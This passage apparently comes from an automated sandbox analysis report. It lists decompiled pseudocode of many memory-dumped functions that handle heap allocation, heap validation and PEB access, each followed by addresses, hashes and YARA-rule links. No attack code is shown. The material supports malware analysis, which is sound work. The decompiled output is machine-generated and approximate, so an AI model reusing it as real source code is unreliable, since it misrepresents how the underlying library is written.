				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0444C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x44011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E044F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









            0x0444c577
            0x0444c57d
            0x0444c581
            0x0444c5b5
            0x0444c5b9
            0x0444c5ce
            0x0444c5ce
            0x0444c5ca
            0x00000000
            0x0444c5ca
            0x0444c5c4
            0x0444c5c8
            0x00000000
            0x00000000
            0x00000000
            0x0444c5ad
            0x00000000
            0x0444c5af

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 095e4cfd69469dca64be601aad615de6906384a8733b2b003bfdde1c1ee3bfdd
            • Instruction ID: 2dd264889d00e45cdc2ce27bdbac37f6f998fd9176f7416193cc1c8fdf5939c8
            • Opcode Fuzzy Hash: 095e4cfd69469dca64be601aad615de6906384a8733b2b003bfdde1c1ee3bfdd
            • Instruction Fuzzy Hash: 62F06DB29176B0DAFF359A148484B2B7BD49B85764F4E846BD40587242E6B4F880C251
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044E2073, Relevance: .0, Instructions: 32COMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E044E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E044DFD22(__ecx);
				_t19 =  *0x451849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4518748; // 0x0
					if(__eflags <= 0) {
						E044E1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4518724 & 0x00000004;
							if(( *0x4518724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4518724; // 0x0
					return E044D8DF1(__ebx, 0xc0000374, 0x4515890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







            0x044e2076
            0x044e2078
            0x044e207d
            0x044e2083
            0x044e20a4
            0x044e20aa
            0x044e20ac
            0x044e20b7
            0x044e20ba
            0x044e20bc
            0x044e20c9
            0x044e20c9
            0x044e20d0
            0x044e20d2
            0x00000000
            0x044e20d2
            0x044e20be
            0x044e20c3
            0x044e20c5
            0x044e20c7
            0x00000000
            0x00000000
            0x044e20c7
            0x044e20bc
            0x044e20d4
            0x044e2085
            0x044e2085
            0x044e20a3
            0x044e20a3

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2ff884eb8d862faf7a7cb95a8d146b68a342d4458ebc9acdf323cd2fa99c6f71
            • Instruction ID: 9065f7e409d7252217fbc471eb5f96561b3e3c6eafabefc694e86d83ce42fa3f
            • Opcode Fuzzy Hash: 2ff884eb8d862faf7a7cb95a8d146b68a342d4458ebc9acdf323cd2fa99c6f71
            • Instruction Fuzzy Hash: 20F027264111844BFF327F2720112F22BD9F785119B0904C7D5A117341C8B9AC87EA10
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F8D34, Relevance: .0, Instructions: 32COMMON
            Download Yara Rule
            C-Code - Quality: 43%
            			E044F8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x451d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04447D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0446B640(E04469AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













            0x044f8d34
            0x044f8d43
            0x044f8d4b
            0x044f8d4e
            0x044f8d52
            0x044f8d5c
            0x044f8d6e
            0x044f8d5e
            0x044f8d67
            0x044f8d67
            0x044f8d79
            0x044f8d7a
            0x044f8d7c
            0x044f8d81
            0x044f8d94

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e15270a4e66ca35d77d35fbd15a83cf2c1bd7e558fea39ccac5aafeb851c618c
            • Instruction ID: 35a228182f5106b42916db5b827da6e56058ce166c6058e06f1125af872311db
            • Opcode Fuzzy Hash: e15270a4e66ca35d77d35fbd15a83cf2c1bd7e558fea39ccac5aafeb851c618c
            • Instruction Fuzzy Hash: 35F0B470E046489FDF14EFB9D441A6EB7B4EF14300F10809AE906EB391EA34F900C755
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0446927A, Relevance: .0, Instructions: 32COMMON
            Download Yara Rule
            C-Code - Quality: 54%
            			E0446927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0446FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E044692C6(_t11, _t14);
				}
				return _t11;
			}





            0x04469295
            0x04469299
            0x0446929f
            0x044692aa
            0x044692ad
            0x044692ae
            0x044692af
            0x044692b0
            0x044692b4
            0x044692bb
            0x044692bb
            0x044692c5

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
            • Instruction ID: a03199cce3f87dd19a4b8382b795583bb1cec640e67b3d936582df12fb7cbd23
            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
            • Instruction Fuzzy Hash: 3DE0E5B23405006BEB519E06DC80B137659AF82724F00407EB5011E243C6F5E80887A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0444746D, Relevance: .0, Instructions: 31COMMON
            Download Yara Rule
            C-Code - Quality: 88%
            			E0444746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0443EB70(__ecx, 0x45179a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E044695D0();
							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









            0x0444746d
            0x0444746d
            0x0444746d
            0x04447471
            0x04447488
            0x0448f92d
            0x0444748e
            0x04447491
            0x04447495
            0x0448f937
            0x0448f93a
            0x0448f94e
            0x0448f953
            0x0448f956
            0x0448f956
            0x04447495
            0x00000000
            0x04447488
            0x04447473
            0x04447478
            0x0444747d
            0x04447481
            0x00000000
            0x04447481
            0x0444747d
            0x0444747a
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dcc67ba3804e30a64a52685fb0ee8197b342f748bf0c4301ed2f45737613051c
            • Instruction ID: 728d804faec5cfa67cd0416c3fce6b987dd0dec310f09f89f7fad570a012a701
            • Opcode Fuzzy Hash: dcc67ba3804e30a64a52685fb0ee8197b342f748bf0c4301ed2f45737613051c
            • Instruction Fuzzy Hash: BEF0E934600144AAFF219B6CC441B7A7F71AF84318F14056BD451A7261F764F803C785
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F8CD6, Relevance: .0, Instructions: 31COMMON
            Download Yara Rule
            C-Code - Quality: 36%
            			E044F8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x451d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04447D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0446B640(E04469AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













            0x044f8ce5
            0x044f8ced
            0x044f8cf0
            0x044f8cfb
            0x044f8d0d
            0x044f8cfd
            0x044f8d06
            0x044f8d06
            0x044f8d18
            0x044f8d19
            0x044f8d1b
            0x044f8d20
            0x044f8d33

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fdc0da87c1009b7d0a1329b09c8e8b4aa5afb9638428a0d5f5407ae05e678cd4
            • Instruction ID: 045f13d496b07e312ae33aaa6e950d59489485952175c2f8e6cf13ed8c47093c
            • Opcode Fuzzy Hash: fdc0da87c1009b7d0a1329b09c8e8b4aa5afb9638428a0d5f5407ae05e678cd4
            • Instruction Fuzzy Hash: 85F0E270A04248ABEF00EBA9E845E6E77B4EF08304F10019AE902EB381EA34F900C755
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F8B58, Relevance: .0, Instructions: 31COMMON
            Download Yara Rule
            C-Code - Quality: 36%
            			E044F8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x451d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04447D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0446B640(E04469AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













            0x044f8b67
            0x044f8b6f
            0x044f8b72
            0x044f8b7d
            0x044f8b8f
            0x044f8b7f
            0x044f8b88
            0x044f8b88
            0x044f8b9a
            0x044f8b9b
            0x044f8b9d
            0x044f8ba2
            0x044f8bb5

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b68e9203fc1de170ddd7d5b7e3255fdaabec8baddc7b6f990d406666140f2129
            • Instruction ID: 275b09cc30dc326f9025abf82cd1b852d8918e20dc71e639eddacade18f081b1
            • Opcode Fuzzy Hash: b68e9203fc1de170ddd7d5b7e3255fdaabec8baddc7b6f990d406666140f2129
            • Instruction Fuzzy Hash: 74F082B0A14258ABEF10EBA9D906E6EB3B4EF04304F04045ABA05DB391EB74F901C795
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04424F2E, Relevance: .0, Instructions: 31COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E04424F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E044F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0444C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4401030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









            0x04424f2e
            0x04424f34
            0x04424f38
            0x04480b85
            0x04480b85
            0x04480b89
            0x04480b9a
            0x04480b9a
            0x04480b9f
            0x00000000
            0x04480b9f
            0x04480b94
            0x04480b98
            0x00000000
            0x00000000
            0x00000000
            0x04480b98
            0x04424f3e
            0x04424f48
            0x00000000
            0x04424f6e
            0x00000000
            0x04424f70

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d94eba0a052dc5943d85a7a9c15486bf6e44b5cc25ab68ae4c1d6dd9b77ecbb0
            • Instruction ID: 6a9528b9b2dfdb79bc66076c768383978b20f61b2008ad5543b923e69032202c
            • Opcode Fuzzy Hash: d94eba0a052dc5943d85a7a9c15486bf6e44b5cc25ab68ae4c1d6dd9b77ecbb0
            • Instruction Fuzzy Hash: 93F0BE325326948FEF72EB98C580B2BB7D8AB807B8F46447BD40587A22D734F848C640
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0442F358, Relevance: .0, Instructions: 28COMMON
            Download Yara Rule
            C-Code - Quality: 79%
            			E0442F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0445F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04444620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






            0x0442f35d
            0x0442f361
            0x0442f367
            0x0442f372
            0x0442f38c
            0x0442f38c
            0x0442f394

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
            • Instruction ID: 1f7a607a9762c34bd9205c2750213761fabf4323d95c179501a6faad5c77a371
            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
            • Instruction Fuzzy Hash: 42E0D832A40128BBEF31A6D99E05F5BBBBCDB44B60F400156F904D7151D964AD00D6D0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0443FF60, Relevance: .0, Instructions: 22COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0443FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x44011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E044F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04440050(_t14);
				}
			}










            0x0443ff66
            0x0443ff6b
            0x00000000
            0x0443ff8f
            0x00000000
            0x0443ff8f

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1799b27e745af56637b9975ee19fb289872fcb76b0eb49f90a000911f59fb1e9
            • Instruction ID: 86a4a3d077841b64a81f3cb9a0f260c0446c733b2d4952a6896ff8113d217768
            • Opcode Fuzzy Hash: 1799b27e745af56637b9975ee19fb289872fcb76b0eb49f90a000911f59fb1e9
            • Instruction Fuzzy Hash: 7CE0DFB0A052049FEF34DF52D040F2737989B4AB2FF19801FF8084BA02C726F885C206
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044DD380, Relevance: .0, Instructions: 21COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E044DD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0442E8B0(__ecx, _a4, 0xfff);
					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




            0x044dd38a
            0x044dd39b
            0x044dd3b1
            0x00000000
            0x044dd3b6
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
            • Instruction ID: a67cb2f5a42598e0aafbb6358a8d4fa1eeda877cebf97d1fd4b5c2324e980581
            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
            • Instruction Fuzzy Hash: 8EE0C231280614BBEF225E44CC00F697B16EF407A4F204036FE089BB91CA75BC92E6C4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445A185, Relevance: .0, Instructions: 20COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0445A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x45167e4 >= 0xa) {
					if(_t5 < 0x4516800 || _t5 >= 0x4516900) {
						return L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04440010(0x45167e0, _t5);
				}
			}





            0x0445a190
            0x0445a1a6
            0x0445a1c2
            0x00000000
            0x00000000
            0x00000000
            0x0445a192
            0x0445a192
            0x0445a19f
            0x0445a19f

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d3c5cd4d9d140a9db2a0a717282184e9e847007597ab9e70ca7161477c836aae
            • Instruction ID: 48e9e43a14beac57cfd320297c7d80c76c922c480a1558a7a32402b8d6c34a74
            • Opcode Fuzzy Hash: d3c5cd4d9d140a9db2a0a717282184e9e847007597ab9e70ca7161477c836aae
            • Instruction Fuzzy Hash: 8BD05B611610005BFF1D7711AA58B252296F7C4719F304D0FF2076E5B6DA54FCD5E148
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044516E0, Relevance: .0, Instructions: 17COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E044516E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04451710(0x45167e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04444620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





            0x044516e8
            0x044516ef
            0x044516f3
            0x044516fe
            0x00000000
            0x04451700
            0x0445170d
            0x0445170d
            0x044516f2
            0x044516f2
            0x044516f2
            0x044516f2

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b98d3d5fc853f317085da18eb154e4fea6c285eb71a29400e11520034ded25bc
            • Instruction ID: 90ecc4ef76f7d6c9844c7194cbc116a20777ca65b431c726f0b5106125f69aac
            • Opcode Fuzzy Hash: b98d3d5fc853f317085da18eb154e4fea6c285eb71a29400e11520034ded25bc
            • Instruction Fuzzy Hash: A8D0A73114010053FE2D5B159804B152251EBC0789F38005EF507599E3CFA4FC92E448
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044535A1, Relevance: .0, Instructions: 12COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E044535A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0443EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






            0x044535a1
            0x044535a1
            0x044535a5
            0x044535ab
            0x044535ab
            0x044535b5
            0x00000000
            0x044535c1
            0x044535b7

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
            • Instruction ID: 067e41fe23caa928f4755c86b03628a51c642fe40472e75fe3a85c455eab8b4d
            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
            • Instruction Fuzzy Hash: E0D0C731551188D9DF52EF50C1347697771BF00799F5830DB9C4745573C335695AD601
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0443AAB0, Relevance: .0, Instructions: 12COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0443AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




            0x0443aab6
            0x0443aabb
            0x0448a442
            0x00000000
            0x0448a448
            0x0448a454
            0x0448a454
            0x0443aac1
            0x0443aac1
            0x0443aac6
            0x0443aac6

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
            • Instruction ID: 9a223a90588cb4cb723421e80f81c54c5d713d74214e53a1b58d99de7840e4c1
            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
            • Instruction Fuzzy Hash: BFD0C935352980CFDB16DF0CC554B0633A4FB44F40FC50491E400CBB21E66CE940CA00
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044AA537, Relevance: .0, Instructions: 11COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E044AA537(intOrPtr _a4, intOrPtr _a8) {

				return L04448E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



            0x044aa553

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
            • Instruction ID: 3a1e0ff12f6f19ad0ae2ddf379d3d717577f9c4c8e34a820df722624800f6000
            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
            • Instruction Fuzzy Hash: 9CC01236080248BBEB127E82CC00F067B2AEB94B60F108015BA080A5618632EA70EA84
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0442DB40, Relevance: .0, Instructions: 11COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0442DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04444620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





            0x0442db4d
            0x0442db54
            0x0442db5f
            0x0442db56
            0x0442db56
            0x0442db5c
            0x0442db5c

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
            • Instruction ID: 34efaeaf9b0a412b30e0e35b173e525d1c46d85510f88fc08cf072f548796e36
            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
            • Instruction Fuzzy Hash: FFC08C70280A00AAFF622F20CE01B017AA0BB40B45F8400A1A300DA4F0DB7CE801EA00
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0442AD30, Relevance: .0, Instructions: 10COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0442AD30(intOrPtr _a4) {

				return L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



            0x0442ad49

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
